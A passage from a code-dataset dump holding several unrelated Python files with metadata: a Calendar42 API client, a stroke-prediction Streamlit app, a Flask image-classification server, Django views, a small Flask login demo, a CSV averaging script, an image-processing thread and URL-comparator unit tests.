self._token,\r\n\t\t}\r\n\t\tresponse = requests.get(full_url, headers=headers)\r\n\t\t\r\n\t\t# Parse response as JSON\r\n\t\ttry:\r\n\t\t\tjson_data = response.json()\r\n\t\texcept ValueError as e:\r\n\t\t\tlogger.exception(e)\r\n\t\t\tlogger.error(\"URL called: %s\\nHere's the body of the response which couldn't get parsed to JSON: %s\" % (full_url, response.text))\r\n\t\t\traise LoggedDetailsAPIException()\r\n\t\t\r\n\t\t# Extract desired information\r\n\t\ttry:\r\n\t\t\tif 'error' in json_data:\r\n\t\t\t\t# Forward error from Calendar42 API to client\r\n\t\t\t\traise LoggedDetailsAPIException(json_data['error']['message'])\r\n\t\t\t\t\r\n\t\t\treturn self.extract_data(json_data)\r\n\t\texcept (KeyError, ValueError, AttributeError) as e:\r\n\t\t\tlogger.exception(e)\r\n\t\t\tlogger.error(\"URL called: %s\\nHere's the JSON data which didn't fit the expected format: %s\" % (full_url, json_data))\r\n\t\t\traise LoggedDetailsAPIException()\r\n\t\r\n\tdef extract_data(self, json_data):\r\n\t\t\"\"\"ABSTRACT METHOD - TO BE IMPLEMENTED IN CHILD CLASS\r\n\t\t\r\n\t\tExtracts the desired information from the JSON data returned by the Calendar42 API\r\n\t\t@param {dict} json_data\r\n\t\t@return {dict}\tThe extracted data\r\n\t\t\"\"\"\r\n\t\tlogger.exception(NotImplementedError())\r\n\t\traise LoggedDetailsAPIException()\r\n\t\r\n\tdef get_relative_url(self, *args, **kwargs):\r\n\t\t\"\"\"ABSTRACT METHOD - TO BE IMPLEMENTED IN CHILD CLASS\r\n\t\t\r\n\t\tReturns the end of the URL, corresponding to the API action to call\r\n\t\t\"\"\"\r\n\t\tlogger.exception(NotImplementedError())\r\n\t\traise LoggedDetailsAPIException()\r\n\r\n\r\nclass EventDetailsAPIActionCaller(APIActionCaller):\r\n\t\"\"\"Gets details (ID and title) of an event\"\"\"\r\n\r\n\tdef get_relative_url(self, event_id):\r\n\t\treturn constants.CALENDAR42_API_EVENT.format(event_id)\r\n\r\n\tdef extract_data(self, json_data):\r\n\t\traw_details = json_data['data'][0]\r\n\t\tdetails = {\r\n\t\t\t'id': raw_details['id'],\r\n\t\t\t'title': raw_details['title'],\r\n\t\t}\r\n\t\treturn details\r\n\r\n\t\t\r\nclass EventParticipantsAPIActionCaller(APIActionCaller):\r\n\t\"\"\"Gets list of participants to an event\"\"\"\r\n\r\n\tdef get_relative_url(self, event_id):\r\n\t\treturn constants.CALENDAR42_API_PARTICIPANTS.format(event_id)\r\n\r\n\tdef 
extract_data(self, json_data):\r\n\t\treturn [item['subscriber']['first_name'] for item in json_data['data']]\r\n", "sub_path": "apiproxy/events/api_action_caller.py", "file_name": "api_action_caller.py", "file_ext": "py", "file_size_in_byte": 3199, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "logging.getLogger", "line_number": 7, "usage_type": "call"}, {"api_name": "apiproxy.constants.CALENDAR42_API_BASE_URL", "line_number": 31, "usage_type": "attribute"}, {"api_name": "apiproxy.constants", "line_number": 31, "usage_type": "name"}, {"api_name": "requests.get", "line_number": 38, "usage_type": "call"}, {"api_name": "exceptions.LoggedDetailsAPIException", "line_number": 46, "usage_type": "call"}, {"api_name": "exceptions.LoggedDetailsAPIException", "line_number": 52, "usage_type": "call"}, {"api_name": "exceptions.LoggedDetailsAPIException", "line_number": 58, "usage_type": "call"}, {"api_name": "exceptions.LoggedDetailsAPIException", "line_number": 68, "usage_type": "call"}, {"api_name": "exceptions.LoggedDetailsAPIException", "line_number": 76, "usage_type": "call"}, {"api_name": "apiproxy.constants.CALENDAR42_API_EVENT.format", "line_number": 83, "usage_type": "call"}, {"api_name": "apiproxy.constants.CALENDAR42_API_EVENT", "line_number": 83, "usage_type": "attribute"}, {"api_name": "apiproxy.constants", "line_number": 83, "usage_type": "name"}, {"api_name": "apiproxy.constants.CALENDAR42_API_PARTICIPANTS.format", "line_number": 98, "usage_type": "call"}, {"api_name": "apiproxy.constants.CALENDAR42_API_PARTICIPANTS", "line_number": 98, "usage_type": "attribute"}, {"api_name": "apiproxy.constants", "line_number": 98, "usage_type": "name"}]}
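A usage sketch for the two concrete callers above; the token and event id are placeholders, and a reachable Calendar42 endpoint would be needed for the calls to succeed:

from apiproxy.events.api_action_caller import (
    EventDetailsAPIActionCaller,
    EventParticipantsAPIActionCaller,
)

token = "api-token"    # placeholder authentication token
event_id = "event-id"  # placeholder event identifier

# call() forwards its arguments to get_relative_url(), so both callers take the event id.
details = EventDetailsAPIActionCaller(token).call(event_id)            # {'id': ..., 'title': ...}
participants = EventParticipantsAPIActionCaller(token).call(event_id)  # list of first names
print(details, participants)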
+{"seq_id": "290191003", "text": "#from fastapi import FastAPI\r\n#from pydantic import BaseModel\r\nimport pickle\r\nimport streamlit as st\r\nfrom sklearn.naive_bayes import GaussianNB\r\nimport numpy as np\r\nimport pandas as pd\r\n\r\n'''\r\napp=FastAPI()\r\nclass request_body(BaseModel):\r\n Age:float\r\n Hypertension:str\r\n Heart_disease:str\r\n Average_glucose: float\r\n BMI: float\r\n Marital_status: str\r\n Gender: str\r\n Work_type: str\r\n Residence:str\r\n Smoking_status: str\r\n'''\r\ndf=pd.read_csv(\"stroke_data_Cleaned3.csv\",header=0)\r\nprint(df.head())\r\n\r\n#Creating X and y Variables for Training Testing datasets\r\nX=df.drop([\"stroke\"],axis=1)\r\ny=df[\"stroke\"] #Target Variable\r\n\r\n#Creating Training Testing datasets\r\nfrom sklearn.model_selection import train_test_split\r\nX_train, X_test, y_train, y_test= train_test_split(X,y, test_size=0.2, random_state=5)\r\n#I have tried using K-best(taking 6 Variables) and the Classification Report doesnot show much Variation thus we are not using K-best\r\n\r\n#Creating Classification Models\r\n#I am using Naive Bayes Classification here, thus Scaling and One Hot Encoding is not Required\r\nmodel=GaussianNB()\r\nmodel.fit(X_train,y_train)\r\ny_pred=model.predict(X_test)\r\n\r\n#Testing effeciency of Naive Bayes Classifier\r\nfrom sklearn.metrics import confusion_matrix, classification_report,recall_score,f1_score\r\ncm=confusion_matrix(y_test, y_pred)\r\nprint(\"Confusion Matrix\")\r\nprint(cm)\r\ncr=classification_report(y_test, y_pred)\r\nprint(\"Classification Report\")\r\nprint(cr)\r\n#Since this dataset is not balanced accuracy is not the measure we will be looking for\r\n# Here we want to reduce the number of False negatives so we will look at Recall and F1 Score\r\nrs=recall_score(y_test,y_pred, average=\"weighted\")\r\nfs=f1_score(y_test,y_pred,average=\"weighted\")\r\nprint(\"Recall Value: \",rs)\r\nprint(\"F1 Score: \",fs)\r\n\r\n#Pickle is used for saving .pkl file\r\n#We are using .pkl file because we are going to deploy the model on Streamlit\r\npickle.dump(model,open('stroke.pkl','wb'))\r\nloaded_model=pickle.load(open('stroke.pkl','rb'))\r\n\r\n#For deploying on the Website\r\ndef predict_input_page():\r\n loaded_model = pickle.load(open('stroke.pkl', 'rb'))\r\n st.title(\"Stroke Prediction Model\")\r\n Age=st.slider(\"Age: \", min_value=0, max_value=90)\r\n Hypertension = st.radio(\"Do you suffer from Hypertension: \",(\"Yes\",\"No\"))\r\n Heart_disease=st.radio(\"Do you suffer from Heart Disease: \",(\"Yes\",\"No\"))\r\n Average_glucose=st.slider(\"Average Glucose Levels: \", min_value=50, max_value=280)\r\n BMI=st.slider(\"BMI: \",min_value=10, max_value=70)\r\n Marrital_status=st.radio(\"Are you married: \",(\"Yes\",\"No\"))\r\n Gender=st.radio(\"What is your Gender: \",(\"Male\",\"Female\"))\r\n Work_type=st.radio(\"What is your Work type?\",(\"Private\",\"Self-employed\",\"children\",\"Govt_job\",\"Never_worked\"))\r\n Residence=st.radio(\"What is your area of Residence\",(\"Urban\",\"Rural\"))\r\n Smoking_status=st.radio(\"Enter your Smoking Status:\",(\"never smoked\",\"Unknown\",\"formerly smoked\",\"smokes\"))\r\n ok=st.button(\"Predict\")\r\n\r\n #Since we are taking the input as a string and the model needs the values in numbers we convert the String to int\r\n if Hypertension==\"Yes\":\r\n Hypertension= 1\r\n elif Hypertension==\"No\":\r\n Hypertension=0\r\n\r\n if Heart_disease==\"Yes\":\r\n Heart_disease= 1\r\n elif Heart_disease==\"No\":\r\n Heart_disease=0\r\n\r\n if 
Marrital_status==\"Yes\":\r\n Marrital_status=1\r\n elif Marrital_status==\"No\":\r\n Marrital_status=0\r\n\r\n if Gender==\"Male\":\r\n Gender=1\r\n elif Gender==\"Female\":\r\n Gender=0\r\n\r\n if Work_type==\"Govt_job\":\r\n Work_type=0\r\n elif Work_type==\"Never_worked\":\r\n Work_type=1\r\n elif Work_type==\"Private\":\r\n Work_type=2\r\n elif Work_type==\"Self-employed\":\r\n Work_type=3\r\n elif Work_type==\"children\":\r\n Work_type=4\r\n\r\n if Residence==\"Rural\":\r\n Residence=0\r\n elif Residence==\"Urban\":\r\n Residence=1\r\n\r\n if Smoking_status==\"Unknown\":\r\n Smoking_status=0\r\n elif Smoking_status==\"formerly smoked\":\r\n Smoking_status=1\r\n elif Smoking_status==\"never smoked\":\r\n Smoking_status=2\r\n elif Smoking_status==\"smokes\":\r\n Smoking_status=3\r\n\r\n testdata=np.array([[Age, Hypertension, Heart_disease, Average_glucose, BMI, Marrital_status,Gender,Work_type,Residence,Smoking_status]])\r\n classi=loaded_model.predict(testdata)[0]\r\n\r\n try:\r\n if ok==True:\r\n if classi == 0:\r\n st.success(\"Awesome! You are on low risk of getting Stroke\")\r\n elif classi == 1:\r\n st.error(\"Cautious! You are on high risk of getting Stroke\")\r\n except:\r\n st.info(\"Enter some Data\")\r\n\r\n\r\n\r\n\r\n", "sub_path": "ML_Project_2_209027.py", "file_name": "ML_Project_2_209027.py", "file_ext": "py", "file_size_in_byte": 4696, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "pandas.read_csv", "line_number": 23, "usage_type": "call"}, {"api_name": "sklearn.model_selection.train_test_split", "line_number": 32, "usage_type": "call"}, {"api_name": "sklearn.naive_bayes.GaussianNB", "line_number": 37, "usage_type": "call"}, {"api_name": "sklearn.metrics.confusion_matrix", "line_number": 43, "usage_type": "call"}, {"api_name": "sklearn.metrics.classification_report", "line_number": 46, "usage_type": "call"}, {"api_name": "sklearn.metrics.recall_score", "line_number": 51, "usage_type": "call"}, {"api_name": "sklearn.metrics.f1_score", "line_number": 52, "usage_type": "call"}, {"api_name": "pickle.dump", "line_number": 58, "usage_type": "call"}, {"api_name": "pickle.load", "line_number": 59, "usage_type": "call"}, {"api_name": "pickle.load", "line_number": 63, "usage_type": "call"}, {"api_name": "streamlit.title", "line_number": 64, "usage_type": "call"}, {"api_name": "streamlit.slider", "line_number": 65, "usage_type": "call"}, {"api_name": "streamlit.radio", "line_number": 66, "usage_type": "call"}, {"api_name": "streamlit.radio", "line_number": 67, "usage_type": "call"}, {"api_name": "streamlit.slider", "line_number": 68, "usage_type": "call"}, {"api_name": "streamlit.slider", "line_number": 69, "usage_type": "call"}, {"api_name": "streamlit.radio", "line_number": 70, "usage_type": "call"}, {"api_name": "streamlit.radio", "line_number": 71, "usage_type": "call"}, {"api_name": "streamlit.radio", "line_number": 72, "usage_type": "call"}, {"api_name": "streamlit.radio", "line_number": 73, "usage_type": "call"}, {"api_name": "streamlit.radio", "line_number": 74, "usage_type": "call"}, {"api_name": "streamlit.button", "line_number": 75, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 123, "usage_type": "call"}, {"api_name": "streamlit.success", "line_number": 129, "usage_type": "call"}, {"api_name": "streamlit.error", "line_number": 131, "usage_type": "call"}, {"api_name": "streamlit.info", "line_number": 133, "usage_type": "call"}]}
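The if/elif ladders in the record above encode each radio-button answer into the integer codes the classifier was trained on. The same mapping can be written as lookup tables; an equivalent sketch, with the table and function names being mine:

YES_NO = {"Yes": 1, "No": 0}
GENDER = {"Male": 1, "Female": 0}
WORK_TYPE = {"Govt_job": 0, "Never_worked": 1, "Private": 2, "Self-employed": 3, "children": 4}
RESIDENCE = {"Rural": 0, "Urban": 1}
SMOKING = {"Unknown": 0, "formerly smoked": 1, "never smoked": 2, "smokes": 3}

def encode_row(age, hypertension, heart_disease, glucose, bmi, married, gender, work, residence, smoking):
    # Produces the same feature order as the testdata array built in the page function.
    return [[age, YES_NO[hypertension], YES_NO[heart_disease], glucose, bmi,
             YES_NO[married], GENDER[gender], WORK_TYPE[work],
             RESIDENCE[residence], SMOKING[smoking]]]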
+{"seq_id": "59612291", "text": "import flask\nimport os\nimport datetime\nimport sys\n\nimport tensorflow as tf\nfrom flask import json\nfrom keras import models\n\n# initialize our Flask application and the Keras model\nfrom safetoswim.core import PhotoProcessor\nfrom safetoswim.repository import PostgresRepository, SqliteRepository\n\napplication = flask.Flask(__name__)\nmodel = None\ngraph = tf.get_default_graph()\nALLOWED_EXTENSIONS = set(['png', 'jpg', 'jpeg', 'gif'])\nUPLOAD_FOLDER = 'images'\napplication.config['UPLOAD_FOLDER'] = UPLOAD_FOLDER\n\n\ndef load_model():\n global model\n file_dir = os.path.abspath(os.path.dirname(__file__))\n #model = ResNet50(weights=\"imagenet\")\n model_path = os.path.join(file_dir, 'models', 'hab_KerasBinaryClassifier_model.h5')\n print(f'Loading model from: {model_path}')\n model = models.load_model(model_path)\n if model is None:\n raise TypeError(f'Failed to load model from file {model_path}')\n\ndef get_model():\n global modele\n if model is None:\n load_model()\n return model\n\n\ndef allowed_file(filename):\n return '.' in filename and \\\n filename.rsplit('.', 1)[1].lower() in ALLOWED_EXTENSIONS\n\n\ndef save_image(submitter, image_location, date, time, name='', location='', latitude=0.0, longitude=0.0):\n repo = SqliteRepository('test.sqlite')\n id = repo.add_sample(submitter, image_location, date, time, name, location, latitude, longitude)\n return id\n\n@application.route(\"/\", methods=['GET'])\ndef index():\n return '''\n Safe To Swim\n Welcome to SafeToSwim!'''\n\n@application.route(\"/predict\", methods=['GET', 'POST'])\ndef predict():\n # initialize the data dictionary that will be returned from the\n # view\n data = {\"success\": False}\n\n # ensure an image was properly uploaded to our endpoint\n if flask.request.method == \"POST\":\n if flask.request.files.get(\"image\"):\n # read the image in PIL format\n image = flask.request.files[\"image\"].read()\n photo_processor = PhotoProcessor(image)\n location = 'OakLedge'\n submitter = 'admin@safetoswim.org'\n longitude = 0.0\n # photo_processor.exif['DateTime']\n # photo_processor.exif['DateTimeOriginal']\n # photo_processor.exif['']\n # photo_processor.exif['']\n # photo_processor.exif['']\n # photo_processor.exif['']\n # photo_processor.exif['']\n # photo_processor.exif['']\n if 'DateTime' in photo_processor.exif_data:\n date = datetime.datetime.strptime(photo_processor.exif_data['DateTime'], '%Y:%m:%d %H:%M:%S')\n else:\n date = datetime.datetime.now()\n time = date.time()\n date = date.date()\n #date, time, name='', location='', latitude=0.0, longitude=0.0\n save_image(submitter, 'images/one.jpg', str(date), str(time), 'New Sample', location,\n photo_processor.latitude, photo_processor.longitude)\n\n # preprocess the image and prepare it for classification\n rgb_data = photo_processor.prepare_rgb_data(img_size=(128, 128))\n\n # classify the input image and then initialize the list\n # of predictions to return to the client\n # classify the input image and then initialize the list\n # of predictions to return to the client\n preds = None\n model = get_model()\n with graph.as_default():\n preds = model.predict(rgb_data)\n if preds[0][0] >= 0.5:\n data[\"prediction\"] = 'bloom'\n else:\n data[\"prediction\"] = 'not-bloom'\n\n #data['exif'] = photo_processor.exif\n\n # loop over the results and add them to the list of\n # returned predictions\n '''\n for (imagenetID, label, prob) in results[0]:\n r = {\"label\": label, \"probability\": float(prob)}\n data[\"predictions\"].append(r)\n 
'''\n\n            # indicate that the request was a success\n            data[\"success\"] = True\n\n            # return the data dictionary as a JSON response\n            response = flask.jsonify(data)\n            return response\n        else:\n            # no file was posted under the 'image' field\n            data[\"description\"] = \"No image file provided\"\n            return flask.jsonify(data), 400\n    else:\n        return '''\n            \n            Upload new File\n            Upload new File\n            \n            %s \n            ''' % \" \".join(os.listdir(application.config['UPLOAD_FOLDER'], ))\n\n\nif __name__ == \"__main__\":\n    print((\"* Loading Keras model and Flask starting server...\"\n           \"please wait until server has fully started\"))\n    load_model()\n    application.run(host=\"0.0.0.0\", debug=True)\n\n", "sub_path": "safetoswim/servers/flask_server.py", "file_name": "flask_server.py", "file_ext": "py", "file_size_in_byte": 4954, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "flask.Flask", "line_number": 14, "usage_type": "call"}, {"api_name": "tensorflow.get_default_graph", "line_number": 16, "usage_type": "call"}, {"api_name": "os.path.abspath", "line_number": 24, "usage_type": "call"}, {"api_name": "os.path", "line_number": 24, "usage_type": "attribute"}, {"api_name": "os.path.dirname", "line_number": 24, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 26, "usage_type": "call"}, {"api_name": "os.path", "line_number": 26, "usage_type": "attribute"}, {"api_name": "keras.models.load_model", "line_number": 28, "usage_type": "call"}, {"api_name": "keras.models", "line_number": 28, "usage_type": "name"}, {"api_name": "safetoswim.repository.SqliteRepository", "line_number": 45, "usage_type": "call"}, {"api_name": "flask.request", "line_number": 62, "usage_type": "attribute"}, {"api_name": "flask.request.files.get", "line_number": 63, "usage_type": "call"}, {"api_name": "flask.request", "line_number": 63, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 65, "usage_type": "attribute"}, {"api_name": "safetoswim.core.PhotoProcessor", "line_number": 66, "usage_type": "call"}, {"api_name": "datetime.datetime.strptime", "line_number": 79, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 79, "usage_type": "attribute"}, {"api_name": "datetime.datetime.now", "line_number": 81, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 81, "usage_type": "attribute"}, {"api_name": "flask.jsonify", "line_number": 118, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 132, "usage_type": "call"}]}
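A client-side sketch for the /predict endpoint in the record above; the host, the default Flask port and the image path are assumptions:

import requests

# The view reads the upload from the 'image' field of a multipart POST.
with open("sample.jpg", "rb") as f:  # placeholder image file
    resp = requests.post("http://localhost:5000/predict", files={"image": f})
print(resp.json())  # e.g. {'success': True, 'prediction': 'bloom'} or 'not-bloom'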
+{"seq_id": "415168496", "text": "# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\nfrom django.views.generic import View, TemplateView, CreateView, UpdateView, FormView, ListView\nfrom django.views import generic\nfrom django.conf import settings \nfrom django.shortcuts import render\n\n# Create your views here.\n\nclass Sell_In_OutView(TemplateView):\n template_name = 'sell-inXsell-out.html'\nsell = Sell_In_OutView.as_view() \n\n\nclass VendasDiariasView(TemplateView):\n template_name = 'vendas_diarias.html'\nvendas_diarias = VendasDiariasView.as_view() \n\n\nclass NielsenView(TemplateView):\n template_name = 'nielsen.html'\nnielsen = NielsenView.as_view()\n\n\nclass CloseUpView(TemplateView):\n template_name = 'close-up.html'\ncloseup = CloseUpView.as_view()", "sub_path": "PowerBiNestle/core/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 745, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "django.views.generic.TemplateView", "line_number": 10, "usage_type": "name"}, {"api_name": "django.views.generic.TemplateView", "line_number": 15, "usage_type": "name"}, {"api_name": "django.views.generic.TemplateView", "line_number": 20, "usage_type": "name"}, {"api_name": "django.views.generic.TemplateView", "line_number": 25, "usage_type": "name"}]}
+{"seq_id": "132611014", "text": "from flask import Flask\nfrom flask import render_template, request, session, url_for, redirect\n\napp = Flask(__name__)\napp.secret_key = 'whoknowsthissecretw'\n\n@app.route('/')\ndef index():\n return render_template('index2.html')\n \n@app.route('/about')\ndef about():\n return render_template('about.html')\n\n@app.route('/login', methods=['POST'])\ndef login():\n user = request.form['user']\n session['user'] = user\n return render_template('welcome.html', user_name=user)\n\n@app.route('/logout')\ndef logout():\n del session['user']\n return redirect(url_for('index'))\n\n\nif __name__ == '__main__':\n app.run(debug=True)", "sub_path": "FlaskEx1/src/ex2_v1.py", "file_name": "ex2_v1.py", "file_ext": "py", "file_size_in_byte": 631, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "flask.Flask", "line_number": 4, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 9, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 13, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 17, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 17, "usage_type": "name"}, {"api_name": "flask.session", "line_number": 18, "usage_type": "name"}, {"api_name": "flask.render_template", "line_number": 19, "usage_type": "call"}, {"api_name": "flask.session", "line_number": 23, "usage_type": "name"}, {"api_name": "flask.redirect", "line_number": 24, "usage_type": "call"}, {"api_name": "flask.url_for", "line_number": 24, "usage_type": "call"}]}
+{"seq_id": "420167610", "text": "import numpy as np\r\nimport matplotlib.pyplot as plt\r\nfrom csv import reader\r\n\r\nx = []\r\ny = []\r\nvalues = []\r\nmax_values = []\r\n\r\n# HÄMTA DATA\r\nwith open('rawdata119870.csv', 'r') as csvfile:\r\n data = list(reader(csvfile))\r\n\r\nfor row in data:\r\n values.append({'x': float(row[0]), 'y': float(row[2])})\r\n\r\n# RÄKNA UT MEDLET\r\nindex = 0\r\nlenSample = 27\r\n\r\nwhile index < len(values):\r\n n = 0\r\n xv = 0 \r\n yv = 0\r\n try:\r\n while n < lenSample:\r\n yv += values[index]['y']\r\n xv += values[index]['x']\r\n n += 1\r\n index += 1\r\n\r\n x.append(xv/lenSample)\r\n y.append(yv/lenSample)\r\n except IndexError:\r\n pass\r\n\r\nplt.plot(x, y)\r\nplt.title('graph')\r\nplt.show()", "sub_path": "AI/data analys/uppgift/2c.py", "file_name": "2c.py", "file_ext": "py", "file_size_in_byte": 733, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "csv.reader", "line_number": 12, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 37, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 37, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 38, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 38, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 39, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 39, "usage_type": "name"}]}
+{"seq_id": "270521174", "text": "import threading\nfrom . import Paragraph\nfrom PIL import Image, ImageDraw, ImageEnhance\n\n#process for the thread that creates the first layer\nclass baseThread (threading.Thread):\n def __init__(self, threadID, lock, image, outputFile):\n threading.Thread.__init__(self)\n self.threadID = threadID\n self.image = image\n self.lock = lock\n self.outputFile = outputFile\n\n def run(self):\n #print(\"Starting \" + self.name)\n # Get lock to synchronize threads\n self.lock.acquire()\n\n pixels = self.image.load();\n\n for x in range(self.image.size[0]):\n for y in range(self.image.size[1]):\n avg = ( pixels[x,y][0] + pixels[x,y][1] + pixels[x,y][2] )//3\n pixels[x,y] = (avg,avg,avg,255)\n\n\n enhancer = ImageEnhance.Contrast(self.image)\n enhancer.enhance(1.8).save(self.outputFile)\n\n # Free lock to release next thread\n self.lock.release()", "sub_path": "dataportrait/portraitimage/lib/baseLayer.py", "file_name": "baseLayer.py", "file_ext": "py", "file_size_in_byte": 964, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "threading.Thread", "line_number": 6, "usage_type": "attribute"}, {"api_name": "threading.Thread.__init__", "line_number": 8, "usage_type": "call"}, {"api_name": "threading.Thread", "line_number": 8, "usage_type": "attribute"}, {"api_name": "PIL.ImageEnhance.Contrast", "line_number": 27, "usage_type": "call"}, {"api_name": "PIL.ImageEnhance", "line_number": 27, "usage_type": "name"}]}
+{"seq_id": "212088095", "text": "\"\"\"\nTesting UrlComparator\n\nThere are little comments for each testcase because the name\nof each testcase is very descriptive\n\"\"\"\n\nfrom django.test import TestCase\nfrom sectionproject.urlutils.urlcomparator.urlcomparator import UrlComparator\n\nclass ComparatorTest(TestCase):\n # input: wiki example in writeup\n # expected: equal\n def test_wikiExample(self):\n urlA = 'http://en.wikipedia.org/wiki/Unit_testing#Unit_testing_limitations'\n urlB = 'http://en.wikipedia.org/wiki/Unit_testing#Language-'\n \n expected = 0\n res = UrlComparator.compareNormalizeUrl(urlA, urlB)\n \n self.assertEqual(expected, res, 'expected: ' + str(expected) +\\\n ', actual: ' + str(res))\n \n # input: two different url\n # expected: one larger than the other, viceversa for opposite direction \n def test_normalGreaterLesser(self):\n urlA = 'www.google.com'\n urlB = 'www.nba.com'\n \n self.assertTrue(UrlComparator.compareNormalizeUrl(urlA, urlB) < 0)\n self.assertTrue(UrlComparator.compareNormalizeUrl(urlB, urlA) > 0)\n \n # input: one url with www., one without\n # expected: correct behavior\n def test_normalizedWWWDotDifferentUrl(self):\n urlA = 'www.google.com'\n urlB = 'nba.com'\n \n self.assertTrue(UrlComparator.compareNormalizeUrl(urlA, urlB) < 0)\n \n # inputs: url with same query in different order\n # expected equal\n def test_normalizedEqualDifferentQueryUrl(self):\n urlA = 'www.google.com/?q=cse403;id=1'\n urlB = 'www.google.com/?id=1&q=cse403'\n \n self.assertTrue(UrlComparator.compareNormalizeUrl(urlA, urlB) == 0)\n \n # input: url with capital letters in path\n # expected: capital letter should come before \n def test_caseSensitiveCases(self):\n urlA = 'www.google.com/Images'\n urlB = 'www.google.com/images'\n \n self.assertTrue(UrlComparator.compareNormalizeUrl(urlA, urlB) < 0)\n \n # input: two urls\n # expected: order by alphabetical order\n def test_sourcecomparison(self):\n urlA = 'www.google.com'\n urlB = 'nba.com'\n self.assertTrue(UrlComparator.compareSourceUrl(urlA, urlB) > 0)\n \n # input: a url and two list where one has exactly the same url\n # expected: source unique for one and not source unique for the other\n def test_sourceUnique(self):\n url = 'www.google.com'\n list1 = ['google.com', 'http://google.com']\n list2 = ['www.google.com', 'something.net']\n \n self.assertTrue(UrlComparator.isSourceUnique(url, list1))\n self.assertFalse(UrlComparator.isSourceUnique(url, list2))\n \n # input: a url compared to 1) same url, 2) different but same norm url, 3) entirely\n # different url\n # expected: 1) False, 2) False, 3) True \n def test_normunique(self):\n url = 'http://en.wikipedia.org/wiki/Unit_testing#Unit_testing_limitations'\n # same url\n list1 = ['http://en.wikipedia.org/wiki/Unit_testing#Unit_testing_limitations']\n \n # norm same url\n list2 = ['http://en.wikipedia.org/wiki/Unit_testing#Language-']\n \n # different url\n list3 = ['wikipedia.org']\n \n self.assertFalse(UrlComparator.isNormalizeUnique(url, list1))\n self.assertFalse(UrlComparator.isNormalizeUnique(url, list2))\n self.assertTrue(UrlComparator.isNormalizeUnique(url, list3))\n \n \n \n \n \n \n \n \n ", "sub_path": "sectionproject/urlutils/urlcomparator/tests.py", "file_name": "tests.py", "file_ext": "py", "file_size_in_byte": 3556, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "django.test.TestCase", "line_number": 11, "usage_type": "name"}, {"api_name": 
"sectionproject.urlutils.urlcomparator.urlcomparator.UrlComparator.compareNormalizeUrl", "line_number": 19, "usage_type": "call"}, {"api_name": "sectionproject.urlutils.urlcomparator.urlcomparator.UrlComparator", "line_number": 19, "usage_type": "name"}, {"api_name": "sectionproject.urlutils.urlcomparator.urlcomparator.UrlComparator.compareNormalizeUrl", "line_number": 30, "usage_type": "call"}, {"api_name": "sectionproject.urlutils.urlcomparator.urlcomparator.UrlComparator", "line_number": 30, "usage_type": "name"}, {"api_name": "sectionproject.urlutils.urlcomparator.urlcomparator.UrlComparator.compareNormalizeUrl", "line_number": 31, "usage_type": "call"}, {"api_name": "sectionproject.urlutils.urlcomparator.urlcomparator.UrlComparator", "line_number": 31, "usage_type": "name"}, {"api_name": "sectionproject.urlutils.urlcomparator.urlcomparator.UrlComparator.compareNormalizeUrl", "line_number": 39, "usage_type": "call"}, {"api_name": "sectionproject.urlutils.urlcomparator.urlcomparator.UrlComparator", "line_number": 39, "usage_type": "name"}, {"api_name": "sectionproject.urlutils.urlcomparator.urlcomparator.UrlComparator.compareNormalizeUrl", "line_number": 47, "usage_type": "call"}, {"api_name": "sectionproject.urlutils.urlcomparator.urlcomparator.UrlComparator", "line_number": 47, "usage_type": "name"}, {"api_name": "sectionproject.urlutils.urlcomparator.urlcomparator.UrlComparator.compareNormalizeUrl", "line_number": 55, "usage_type": "call"}, {"api_name": "sectionproject.urlutils.urlcomparator.urlcomparator.UrlComparator", "line_number": 55, "usage_type": "name"}, {"api_name": "sectionproject.urlutils.urlcomparator.urlcomparator.UrlComparator.compareSourceUrl", "line_number": 62, "usage_type": "call"}, {"api_name": "sectionproject.urlutils.urlcomparator.urlcomparator.UrlComparator", "line_number": 62, "usage_type": "name"}, {"api_name": "sectionproject.urlutils.urlcomparator.urlcomparator.UrlComparator.isSourceUnique", "line_number": 71, "usage_type": "call"}, {"api_name": "sectionproject.urlutils.urlcomparator.urlcomparator.UrlComparator", "line_number": 71, "usage_type": "name"}, {"api_name": "sectionproject.urlutils.urlcomparator.urlcomparator.UrlComparator.isSourceUnique", "line_number": 72, "usage_type": "call"}, {"api_name": "sectionproject.urlutils.urlcomparator.urlcomparator.UrlComparator", "line_number": 72, "usage_type": "name"}, {"api_name": "sectionproject.urlutils.urlcomparator.urlcomparator.UrlComparator.isNormalizeUnique", "line_number": 88, "usage_type": "call"}, {"api_name": "sectionproject.urlutils.urlcomparator.urlcomparator.UrlComparator", "line_number": 88, "usage_type": "name"}, {"api_name": "sectionproject.urlutils.urlcomparator.urlcomparator.UrlComparator.isNormalizeUnique", "line_number": 89, "usage_type": "call"}, {"api_name": 